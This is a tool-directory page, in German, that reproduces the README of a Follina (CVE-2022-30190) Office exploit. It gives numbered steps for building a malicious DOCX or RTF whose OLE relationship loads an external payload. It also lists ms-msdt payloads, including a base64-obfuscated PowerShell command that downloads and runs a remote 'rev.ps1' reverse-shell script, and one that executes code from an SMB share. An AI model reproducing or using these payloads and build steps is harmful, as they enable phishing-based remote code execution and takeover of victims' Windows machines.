Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
MS-MSDT-Office-RCE-Follina — CVE-2022-30190 | MS-MSDT Follina Ein Klick | Kitploit
Tools/GitHubGitHub/0xflagplz/ms-msdt-office-rce-follina
Phishing-ToolsPayload-GenerierungExploitationLaterale BewegungWebanwendungs-ExploitationCommand and Control
GitHub0xflagplz/ms-msdt-office-rce-follina

MS-MSDT-Office-RCE-Follina

CVE-2022-30190 | MS-MSDT Follina Ein Klick

Repository anzeigen
2012vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

MS-MSDT-Office-RCE-Follina

CVE-2022-30190 | MS-MSDT Follina Ein Klick

  1. Erstellen Sie eine DOCX-Datei.
  2. In der DOCX-Datei: Einfügen > Objekt > Bitmap-Bild > OK
  3. Speichern Sie die Paint-Datei in der geöffneten Paint-Anwendung.
  4. Speichern Sie Ihre DOCX-Datei.
  5. Öffnen Sie Ihre Datei als Archiv (mit 7-Zip; Rechtsklick > 7-Zip > Archiv öffnen.)
  6. Kopieren Sie die Dateien Document.xml aus \Word\ und document.xml.rels aus \word_rels\ heraus.
  7. Öffnen/Bearbeiten Sie die Datei \word_rels\Document.xml.rels und suchen Sie das XML-Tag für die Beziehung mit "/relationships/oleObject". Ersetzen Sie anschließend das Ziel in "Target=" durch Ihr entferntes Ziel, von dem die Nutzlast abgerufen wird. Fügen Sie außerdem "TargetMode="External"" zum XML-Tag hinzu.
  8. Komprimieren Sie zurück zur DOCX-Datei (Senden an > Komprimierter (gezippter) Ordner | Dateityp von zip in docx/doc umbenennen)

RTF-Dateityp

Sobald eine DOCX-Datei mit den unten stehenden Parametern/Schritten gespeichert wurde, speichern Sie die DOCX-Datei als RTF.

Wenn Sie zusätzlich diese Elemente unter dem <o:OLEObject>-Element in word/document.xml hinzufügen:

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

Der Vorgang des erneuten Komprimierens kann auch aus JohnHammonds Python-Skript entnommen werden:
~ Rebuild the original office file ~

root@kitploit:~
shutil.make_archive(args.output, "zip", doc_path)  
os.rename(args.output + ".zip", args.output)  

Reference: https://github.com/JohnHammond/msdt-follina/blob/main/follina.py


Nutzlasten

Einfache Calc-Ausführung:

root@kitploit:~
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

Kann Start-Process('calc') ersetzt werden durch:

IEX('calc.exe')


SMB-Freigabe-Ausführung:

root@kitploit:~
<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=/../../$(\\\\taretip\\share\\poc)/.exe)"";
</script>

PS1-Dateiladung:

root@kitploit:~
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cG93ZXJzaGVsbC5leGUgLWMgImlleCAoaXdyIGh0dHA6Ly8xOTIuMTY4LjE5OC4xMjgvcmV2LnBzMSAtVXNlQmFzaWNQYXJzaW5nKSIK'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>  

Dekodiert: Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("powershell.exe -c "iex (iwr http://192.168.198.128/rev.ps1 -UseBasicParsing)""))


Die Apache2 access.log sollte beim Öffnen der Datei eine Verbindung anzeigen

Protokollbeispiel

Tool herunterladen